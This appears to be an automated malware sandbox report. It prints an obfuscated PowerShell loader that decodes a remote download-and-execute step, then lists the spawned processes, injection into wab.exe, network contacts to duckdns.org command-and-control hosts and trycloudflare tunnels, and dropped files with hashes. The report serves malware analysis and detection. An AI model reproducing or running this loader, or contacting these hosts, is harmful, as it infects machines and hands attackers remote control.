Pac.wfa.lt-I,dreOStabibBa nejEffaceHemmec Del.tStvle SubmeSBlehay ForksHov,dtaa,nieSuperm Geog.Isaf,NHeksee Strit.mord.BruskWNydane AppebSprucCLorunl uropiSandkeBen.hn attt');$Spndingsfelts203+=$Juvenescent[1];Udtrringers192 ($Spndingsfelts203);Udtrringers192 (Gustatorially 'White$AllevO Mgbuu E,datUkuraw a,marOpdrie yerssHai.ht P,iolBrepieLovke2Nedre3 Gaus3Epoxy. DambH Anj,eHaanda LededSwatheForgrrVeeresKvaje[Modar$ MakuFDommeoCognalMyth.kDoddetTtesaa,traclBredse.nfla] Tele=Sjl n$VoiceUGearslIntrov UheleArsenmOdor,oa.starpointeBuc snOrg,nsT.gen ');$Arabine=Gustatorially ' Semi$AbnegOstambuOli.rtT mliwIndvirVerite DecisVelmat N.guludd,leMenui2 Rigs3Hjspn3polym.CeltiDBrepio CertwBjerrnCh rilPharsoAsteraIncapd EcclFGeneriNonfalBibl,eF,nat(.arni$overibPolemrBondenFla,beRimp,sSalamd SerieMe.vrramnio, p,nc$ prajEB.sman astfcTopkioBalleuM.mmin Joust,undbe SeporPileneattriru ifl)Out,e ';$Encounterer=$Juvenescent[0];Udtrringers192 (Gustatorially 'Ac,ou$Skovhg rddelungdoo,urvlbSilenaNonasl mo t:Hjae.FCats.oTilb,rAartie SiftsDemonh fibuoTouchwKvindn Sque=betel(G,napT HelgeMisers En.jtbolth- distPFarv a Ve,it Adoph Sync Batti$SinfuEHjeman Do ecGadedobe ieuKre.snKorrittoryseToityrUnsufeDubbirEpigr).tepg ');while (!$Foreshown) {Udtrringers192 (Gustatorially 'A.ena$ Su.pgTilralBestioPawnbbCalycaF lmllFragt:StrapE Kri,nCamert FormrBudgee yreas Do.p=Parke$Faglit,remdr erneuTosseekunde ') ;Udtrringers192 $Arabine;Udtrringers192 (Gustatorially 'HjemgSbohawtTer,aaCanunrProagtAmfit-presiS BobalBakkeeLerk,ehognopCarbo ,ilit4Iland ');Udtrringers192 (Gustatorially ' Illu$OxidagT,keml AnasoDelfibcontea Indrl Calc:BookrFinseco FderrApio.e rifsRecidhRoueco ImprwMtaalnManha=Cheso( TeleTUncome U,easCompatCleri-GravePTrappaQuarttSpeakhgen.p tomga$Un,ryEJurymn Ect,cMountotempeu Kbesnu ptit ElveeNobbirMesteeSnowsrTholl)int o ') ;Udtrringers192 (Gustatorially 'f,jlt$MataegmegallAtomsoSk.anbPettia Ju,ilDuod,: stilDDeanei .lgesLectreEkspedBrackiP,dalf .rehyGr,as3Stand7Marga=Acrid$O jusgG ronlU.conoInkambForsga T.dsl Aggr: FlorKV.calaFolkesStamckSkftne PastlOvereo eawatKapactFasteeS iranRendy+ P.in+Tem.n%Unwir$TalekPHelbraPredirDkketi Salit TimeePhonet.onine Bradr Pik.n Sjage,fatt.S,natcVermuoArvemuRes,nnP nsit U,nt ') ;$brnesder=$Pariteterne[$Disedify37];}$Biosociological=318639;$Rundbue=29425;Udtrringers192 (Gustatorially ' Over$SyndegGitril LeonoFlunkbTr rea,aktrl Opga:ProteFOutheyKnoxvr Endes,vingtRealiiKamern U.fodKommue PosisForhi2Teleg2 aker0Tests Sekan=corna DesocGbic.peKnasttBu.df-,lvtjCEgetro aakrnRed.ct StjaeProklnDowertHeck, Morge$sateeE Taxan.oddecvoeproVa,beuSandenKaraftlensge RevirFangeePal trNicol ');Udtrringers192 (Gustatorially 'Efter$ eakagSl,nil Ubego oteebAflydaEtuvelSubdu:PneumfNor.aiEnjoyrBeskfeBrestaPretrarinderTronasBalledArbejrSpi,eeCodfinrifligKompae Stat Glim= .rub Indga[SubriSUnin yTeknis BeautCapseePoonsmNrhed. EireC,ntieo,ancenskattvAfskeeOverfr IdentJoyan]ticki:Oopod: Ep.xFAfsk,rSkellodevotmHjertBSubtraprotosSrilae Evan6Sulam4 espS Pr,etOmfavr LuftiYardwnDisgugFe lb(morki$EfterFAs eny.fterrD marsHetertNona iSwellnGudfadNeosse Sta,sA gum2 Klin2Negro0Stoke)Kl en ');Udtrringers192 (Gustatorially 'Amaya$ TampgConfilOprreoUnmenbru,peapaaf.l Grad:,ekstTVejlohHasslaBetonlSk.ezamon,msPostgsPostlijorden AcomiTabu,dV lndiFe.tiaSpe ln Ther Badel=Broil Tanno[I.revSLeukoy Abs sSchertA,bumeForekm Prel.a.cesTret.ieLoka.xRabbitisido..ntaeECapitnBeed,cVikaroTerridInvitiEx,rinFi algBourg]Pensi:Fugtp:Sc,weAShackSBe.agCAchroIBoldeI.praa.Stra GOutsleVortitS effS ,umetklun.rBondsiSkrivn UnimgTnder( Gab,$Persef Episi ,ymprBeslueGazelaHandeaGl,rmr urrsAtolsdBere,r PlomeSt aln Fluog Wageeteist)Dislo ');Udtrringers192 (Gustatorially 'fle s$ OvergHyosclGene.oWh teb irkaVikkil Dogm: CreaCgerrie Kal rA.lega BegamM temaBoba l ocia=Balte$Fors TTraphhDisila ermol pfora,npinsS.vblsO teoiAds,lnOpticiarc edRecomis iriaSamm,n efou.UnwetsTestauStyreb FanasSkriftThermrulseliMiliensupe.gjudah(,nfer$EfterBexhusi loudou,errsDegreoSunnicFikekiApokooSympolOverfo,lkevgSlantiHenvec S,aaaPrci.lTotal,Nonch$SamfuRBikseu,azhynEpoped Afdebvilliu MuckeHnse )Brost ');Udtrringers192 $Ceramal;"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea FolkpNogggpAgnindgvenda.odsetRegloaarchi%Krimi\uv.asKunivelNonada mishv PalbeTal,yrOmop sGassl.B,dstUAposteDyppen Eino .verl& Sprj&Te,no Scane Kongc ModehPollaojejun Varu tWindi ';Udkrte (Circuted 'Nonsy$IndisgFeriel,anneoUgerabOutlaaAnti l,rist:WillyNMytolo,rocenun ersStilitBraktuUnsh d FascySurli=Kdest(BeforcProtom OverdVolde Flers/Unde.cDisin Whabb$ G,amTHjemmh araleScarvrSe uemUsnoboKardirRoeddePeri,mHenhraI,difnLurefegerman .omet ,lle1Over 2Sub.e) ,und ');Udkrte (Circuted 'averr$Luf,egFaerdlTaphvoBru.sbArchpa Flytl Diss:TurnePTautoaResigrGorinaSel.kpNonaroNrmeldRev,l=Co.on$AkkusSSuperk C enrActedaOplseaAf,kir ilmeDi tam gattm T.leeLrlinnSk,bssPopul. fyris U depsnedkl.alkiiAutontSofav( Baro$EnklaSHygroppiqueiheav,sMeteoeOpbudsHals tBie.dekamm.lDydsk).orsv ');$Skraaremmens=$Parapod[0];$Kriminalromans= (Circuted 'Orgel$Zonopgun,erlUdstoobrdskbBostra V,sslUnbal:PositAAabnin.airbdVect,eUmedgfPagi.aP ohidVandleFlagsrArgene CactnRhota=CykelNEppieeDalr wNitzh-UdradO SletbPaaklj,oacceRabarcSlumptSmurr DiplaSUncolyPil.rsCattatB.sageEjendmF rda. SvigNSprngeBeslutZapti. Co,dWHusbaegan,tbHypocCTopollOestriThumbe Bi on Skldt');$Kriminalromans+=$Nonstudy[1];Udkrte ($Kriminalromans);Udkrte (Circuted 'Fiksp$U,derAOmstinHampsdhyposeI iqufOlo,ea Rectd,rinteStudirUndsae.zarinAlphi. UtilHSaccaeHesseaDiaspd SbireFilmar PttssSemec[Tknin$ VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cIstanaKaravlSlag. ');$Amenable=Circuted ' Unio$ Fa.rASkr,lnRetoudPottieKassefInstia IndudNap.deC,olurOverfeUncomnFlomm.ProduDRejseoSpanlw,lgtsnUdkoml T.nko ,luka HenvdSysteFSkrmdi.ortel IllaeParak(Mis,i$B gstSkilomkTricorNon haSkovraDuod.rB ntweJussim.eordmComp eGigannPh,nes Prog,Un,na$ a byDUncapu Sanks onstAfskapHrg.roTra,diHastin EpiztRefec)Adroi ';$Dustpoint=$Nonstudy[0];Udkrte (Circuted 'S.efn$UdsttgBeskyl elloAnginbStyreaRespelNonco:ScintPKomitaK bler,ontra Tricm S akySikahoPa,igcExplalNonfeo Thern.laddu BlomsRa.ad=dand.(,mbelTSt.inef,rdjs InfitGummi-CheckP SamsaExcretmandahInd,s Ubeti$DewfaDWarbluAfmytsForeltBarrip AngioC.loriFoaminResult Deej)Truss ');while (!$Paramyoclonus) {Udkrte (Circuted 'Steth$ F emgst ndl ValeoGra,sb Se.iaMemorl phea:OpirrH GashoTach.vS.rteeSvierd FounsH emma Fedel Intea Hks.tReguleFod,orSt.lt=lania$ Ageit MegerScyphu .ilbeTrout ') ;Udkrte $Amenable;Udkrte (Circuted ' PorpSRandotLimo,aZunisrB.nkrtMun.k-GypteST.anqlP efoeBactee Forhpmarku Culte4Oktan ');Udkrte (Circuted 'Adiab$ .anggSphe l soljo L.ncbWistiaSpinelS,mis:Bath PUac ea Ti srMiddaa.lassmLine,yHyperoDemobcSau,olForbroVrgelnG.dlsugenansStill=For.m(DuritT Te,neDemarsSelectLege.-AnlgsPRinjiaTraittLandih S lf A,ipo$ColliDPaxamufinansR,sentMust,p Rituo OlieiGaussnTyp gtAnthr)Alkoh ') ;Udkrte (Circuted 'Jubel$CubbygUdflelSmirkoSc,osbVocifaAsexul ,roc:Sa gsN .gndoTrternFinlasHi,lgeOpmrkvTroileSc.nsrsan,ei AccetCo.yni InsueUtjspsSocia=Edema$ BrysgHydr l S,ikoBeamab Pogoade,telSabat: VaabDBill,y,ekstr vabe Fi.drParaliPr,pogRodese LnfosNarci+ Bara+ Pric%.syls$H,droPDalmaaIdrtsrMisw,asr.espcom,yoKlejnd uldb.osteicDentaoReng.u St un Opgrt esk ') ;$Skraaremmens=$Parapod[$Nonseverities];}$Genindkalder112=320122;$Uncharge=28893;Udkrte (Circuted ' issp$Pos.kg.affel,obotoCerclb.edfra AnsglSemiy:L.jrsFT.steu RifalArbejdinde,eP,ckpnSpaltdNon,eeKuldkn Kl pdForbre Angr t kst=Echin HoundGPr,toe .alutBrneh-,ekreC downoaerugn Beg t MulleLedevn.ndeftOutdr Bi tr$ oreiD.andsumineasRe.artGardipAfstroCymogi DolenImdegtGangl ');Udkrte (Circuted 'H.ppe$depotgPolyplServooretspbChi,eaSuperlPre,c:NulstF DagliAftenrP,oteeProseoPostpgchrist O,eryOutg vPo,nse adinsTekst Pinda=B vaa Virke[Rya,bSOutp,yVegecsSwee tWe.daeOpaq m ,tom.MakinC Ec,ao RelenHalv vKar.oePtil.r WashtIndfr]Speck:Vedta: AflyFSsterrGg.ero Un,imBirtiBCarolaCombrsbldgreSc,og6Tempo4HjernSAdrestSt.phrGevini,uditnplantgBurge(nonpe$ Enr FreglouK.akslPro ldSto.ae.ullanWitnedarbejeKludenCrossdRetsbeUnder)Rose, ');Udkrte (Circuted 'Solip$SharpgMo,snlS.ottoBrutabBaggraSpa el Futi: utstEGrosgl IndfaKettipan.elhBr etuPetalrSnailu jurisEn,la1 Delb5 Te,h .ncon=Viges Aktio[ GnidS Gal,yC tassEm,nctTenoneSynecm syba..ebatTB,rdfes,nsfxGr.cetEurot.RhumbEGldsbnScarrcOver,oBesondtaxpaiUd,honTraadgSides] Vand:Sikah:AllopARee.pSRovetC ScioISorteITllel..bensGOnst.eDavietSwagbSBurr,t RegnrArmodirubrinFormegMaan.(Confi$NonetFTiltaiU taprTrinneAgroso Urvrg Kodet FrpeyBarnyv Lo,geEr.essArres)S rpe ');Udkrte (Circuted 'Fusen$Nanocg lectl.rlovoSt.llb.ivasaByplalDisha: BobbEEksekk SadlsoverwiBeshrlInv,clUrrl,eEndaddNatioe Pr,er Stil2,anta3Inbur0Tress=Udfrd$HundrEPiratlFokusa SpecpSlvfahTilkauTriasr HarpuAttessNiflh1Godfr5P.ilo.ChaetsUneffuBushwbSu,ersstegatSloverDyrekiSkruenRekomgSorti(Vindh$ BortGunruseNomadnReadmiUnme nPlatid S.amkBordea.spirlSer edKnytte Stilr Stil1Mammi1Valgm2 Blep, N.dd$ AnalUMammanPudiac sarch Fo.saAbiosr RetsgT.uemeWaist)Lung. ');Udkrte $Eksilleder230;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Etherisers.Ops && echo t"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4880,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 floor-contemporary-genius-accommodation.trycloudflare.com udp
US 8.8.8.8:53 floor-contemporary-genius-accommodation.trycloudflare.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 104.16.230.132:443 floor-contemporary-genius-accommodation.trycloudflare.com tcp
US 8.8.8.8:53 floor-contemporary-genius-accommodation.trycloudflare.com udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
SE 184.31.15.40:443 bzib.nelreports.net tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 132.230.16.104.in-addr.arpa udp
US 8.8.8.8:53 56.104.245.94.in-addr.arpa udp
US 8.8.8.8:53 57.250.36.23.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
CZ 2.23.9.218:443 www.microsoft.com tcp
US 8.8.8.8:53 158.6.107.13.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 invoicetrycloudflare.com udp
NL 185.29.11.28:9983 invoicetrycloudflare.com tcp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 51.140.242.104:443 nav-edge.smartscreen.microsoft.com tcp
GB 51.140.242.104:443 nav-edge.smartscreen.microsoft.com tcp
GB 51.140.242.104:443 nav-edge.smartscreen.microsoft.com tcp
GB 51.140.242.104:443 nav-edge.smartscreen.microsoft.com tcp
GB 51.140.242.104:443 nav-edge.smartscreen.microsoft.com tcp
GB 51.140.242.104:443 nav-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 40.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 218.9.23.2.in-addr.arpa udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 28.11.29.185.in-addr.arpa udp
US 8.8.8.8:53 104.242.140.51.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 175.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 xvern429.duckdns.org udp
US 12.202.180.134:8890 xvern429.duckdns.org tcp
US 8.8.8.8:53 134.180.202.12.in-addr.arpa udp
US 8.8.8.8:53 floor-contemporary-genius-accommodation.trycloudflare.com udp
NL 185.29.11.28:9983 invoicetrycloudflare.com tcp
NL 185.29.11.28:9983 invoicetrycloudflare.com tcp
US 8.8.8.8:53 dhhj.duckdns.org udp
US 12.202.180.134:8797 dhhj.duckdns.org tcp
US 8.8.8.8:53 xgmn934.duckdns.org udp
US 12.202.180.134:8896 xgmn934.duckdns.org tcp
NL 185.29.11.28:9983 invoicetrycloudflare.com tcp
US 8.8.8.8:53 www.sendspace.com udp
US 104.21.28.80:443 www.sendspace.com tcp
NL 185.29.11.28:9983 invoicetrycloudflare.com tcp
US 104.21.28.80:443 www.sendspace.com tcp
US 8.8.8.8:53 fs12n2.sendspace.com udp
NL 185.29.11.28:9983 invoicetrycloudflare.com tcp
CA 69.31.136.53:443 fs12n2.sendspace.com tcp
US 104.21.28.80:443 www.sendspace.com tcp
US 8.8.8.8:53 crt.sectigo.com udp
US 104.18.38.233:80 crt.sectigo.com tcp
US 8.8.8.8:53 80.28.21.104.in-addr.arpa udp
US 8.8.8.8:53 53.136.31.69.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 fs12n3.sendspace.com udp
CA 69.31.136.53:443 fs12n3.sendspace.com tcp
CA 69.31.136.53:443 fs12n3.sendspace.com tcp
US 8.8.8.8:53 newremisco2905.duckdns.org udp
FR 163.172.59.233:2905 newremisco2905.duckdns.org tcp
US 8.8.8.8:53 nmds.duckdns.org udp
US 12.202.180.134:8895 nmds.duckdns.org tcp
US 8.8.8.8:53 233.59.172.163.in-addr.arpa udp
US 104.21.28.80:443 www.sendspace.com tcp
US 8.8.8.8:53 fs03n1.sendspace.com udp
CA 69.31.136.17:443 fs03n1.sendspace.com tcp
US 8.8.8.8:53 17.136.31.69.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 104.21.28.80:443 www.sendspace.com tcp
US 8.8.8.8:53 fs13n5.sendspace.com udp
CA 69.31.136.57:443 fs13n5.sendspace.com tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 57.136.31.69.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 104.21.28.80:443 www.sendspace.com tcp
US 8.8.8.8:53 fs13n1.sendspace.com udp
CA 69.31.136.57:443 fs13n1.sendspace.com tcp
US 104.21.28.80:443 www.sendspace.com tcp
US 8.8.8.8:53 fs03n2.sendspace.com udp
CA 69.31.136.17:443 fs03n2.sendspace.com tcp
US 104.21.28.80:443 www.sendspace.com tcp
US 8.8.8.8:53 fs13n3.sendspace.com udp
CA 69.31.136.57:443 fs13n3.sendspace.com tcp
US 8.8.8.8:53 x5387400.duckdns.org udp
US 12.202.180.134:8896 x5387400.duckdns.org tcp
NL 23.62.61.97:443 www.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 floor-contemporary-genius-accommodation.trycloudflare.com udp
US 8.8.8.8:53 floor-contemporary-genius-accommodation.trycloudflare.com udp
US 8.8.8.8:53 newremisco2905.duckdns.org udp
FR 163.172.59.233:2905 newremisco2905.duckdns.org tcp

Files

memory/1812-0-0x00007FF8AE0B3000-0x00007FF8AE0B5000-memory.dmp

memory/1812-10-0x0000025B7A050000-0x0000025B7A072000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mpn0jbj1.gez.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1812-11-0x00007FF8AE0B0000-0x00007FF8AEB71000-memory.dmp

memory/1812-12-0x00007FF8AE0B0000-0x00007FF8AEB71000-memory.dmp

memory/1812-13-0x00007FF8AE0B0000-0x00007FF8AEB71000-memory.dmp

memory/1812-14-0x00007FF8AE0B3000-0x00007FF8AE0B5000-memory.dmp

memory/1812-15-0x00007FF8AE0B0000-0x00007FF8AEB71000-memory.dmp

memory/1812-19-0x00007FF8AE0B0000-0x00007FF8AEB71000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0f6a3762a04bbb03336fb66a040afb97
SHA1 0a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA256 36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512 cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

memory/6064-31-0x000001E0CB7C0000-0x000001E0CB7D2000-memory.dmp

C:\Users\Admin\Downloads\DXJS.zip

MD5 233b07fa9968bca321bdee5800365833
SHA1 2131aa59097e2847f5911802778dc3ebb2dee939
SHA256 6cb542b6f60083f8a67fab69648c8d46a7fb70cb33a589295ce18e3417b82e8f
SHA512 0daf59ea5e23b4b0c0979cc7319176de6987530258f88aeac8712240dd0ff70b9a651e8f796be1c2c2b41a5e0f5267a460b29b5f258b5a7cbf676335aaaca5dd

memory/6064-32-0x000001E0CB310000-0x000001E0CB31A000-memory.dmp

C:\Users\Admin\Downloads\Python\Python312\Lib\test\cjkencodings\shift_jis-utf8.txt

MD5 cc34bcc252d8014250b2fbc0a7880ead
SHA1 89a79425e089c311137adcdcf0a11dfa9d8a4e58
SHA256 a6bbfb8ecb911d13581f7713391f8c0ceea1edd41537fdb300bbb4d62dd72e9b
SHA512 c6fb4a793870993a9f1310ce59697397e5334dbb92031ab49a3ecc33c55e84737e626e815754c5ddbe7835b15d3817bf07d2b4c80ea5fd956792b4db96c18c2f

C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\__init__.py

MD5 c3239b95575b0ad63408b8e633f9334d
SHA1 7dbb42dfa3ca934fb86b8e0e2268b6b793cbccdc
SHA256 6546a8ef1019da695edeca7c68103a1a8e746d88b89faf7d5297a60753fd1225
SHA512 5685131ad55f43ab73afccbef69652d03bb64e6135beb476bc987f316afe0198157507203b9846728bc7ea25bc88f040e7d2cb557c9480bac72f519d6ba90b25

C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\builtin\__main__.py

MD5 47878c074f37661118db4f3525b2b6cb
SHA1 9671e2ef6e3d9fa96e7450bcee03300f8d395533
SHA256 b4dc0b48d375647bcfab52d235abf7968daf57b6bbdf325766f31ce7752d7216
SHA512 13c626ada191848c31321c74eb7f0f1fde5445a82d34282d69e2b086ba6b539d8632c82bba61ff52185f75fec2514dad66139309835e53f5b09a3c5a2ebecff5

C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_importlib\resources\namespacedata01\binary.file

MD5 37b59afd592725f9305e484a5d7f5168
SHA1 a02a05b025b928c039cf1ae7e8ee04e7c190c0db
SHA256 054edec1d0211f624fed0cbca9d4f9400b0e491c43742af2c5b0abebf0c990d8
SHA512 4ec54b09e2b209ddb9a678522bb451740c513f488cb27a0883630718571745141920036aebdb78c0b4cd783a4a6eecc937a40c6104e427512d709a634b412f60

C:\Users\Admin\Downloads\Python\Python312\Lib\test\test_pydoc\__init__.py

MD5 4a7dba3770fec2986287b3c790e6ae46
SHA1 8c7a8f21c1bcdb542f4ce798ba7e97f61bee0ea0
SHA256 88db4157a69ee31f959dccbb6fbad3891ba32ad2467fe24858e36c6daccdba4d
SHA512 4596824f4c06b530ef378c88c7b4307b074f922e10e866a1c06d5a86356f88f1dad54c380791d5cfda470918235b6ead9514b49bc99c2371c1b14dc9b6453210

C:\Users\Admin\Downloads\Python\Python312\Scripts\pip3.12.exe

MD5 ece8006a0714b569546a3f789638a55a
SHA1 520ba56fd30bcf1e08eefb390d392905c3470936
SHA256 e9059568c5f1200915f581cf582da6465d68a4b558972c6b5e3501f4aa63de7b
SHA512 bb8926c7938da517104afab2f34c8dfc3bfb8c64241770b6e36f1170b87059d32e9b81b9b0451735718e62be123c27f6a053630c85e1b5b21ede6aca7062fe5c

C:\Users\Admin\Downloads\Python\Python312\python.exe

MD5 3d44212bba2d7a88d6c83ce8523bba88
SHA1 62ea5374c17b0f2f88f7d4a6c03b592393dba6f8
SHA256 15b41a488c356c0e331facdea6c836a6cec021f12d5fde9844e7ca4a1aa0361a
SHA512 89297f1fbe811b23a38fc3dbc22989dfb9faf97960c65f1f0f43be710204b32f41f33ef0bb893815db71c4462d04b52f686b40801f6d4cbd8e529d740618ac67

C:\Users\Admin\Downloads\Python\Python312\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\Downloads\Python\Python312\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\__pycache__\cp1252.cpython-312.pyc

MD5 d42473ce94dd1209f1a2b65e7cc79d8f
SHA1 56001bd8a180e758e23fa9ff6fe37ec5fc29b6dc
SHA256 d7dc1703ebe0364c99ed7c8b02423b80c2ee6f48f31023ca8b7b836e83dc50db
SHA512 a523186188060a51849627c3dda24d39b414fa613ae7ab3895ed9b108cc96843019bc2fa475462ef33490bac9ee3e76dd868e699055341f66821557141db478b

C:\Users\Admin\Downloads\Python\Python312\Lib\encodings\cp1252.py

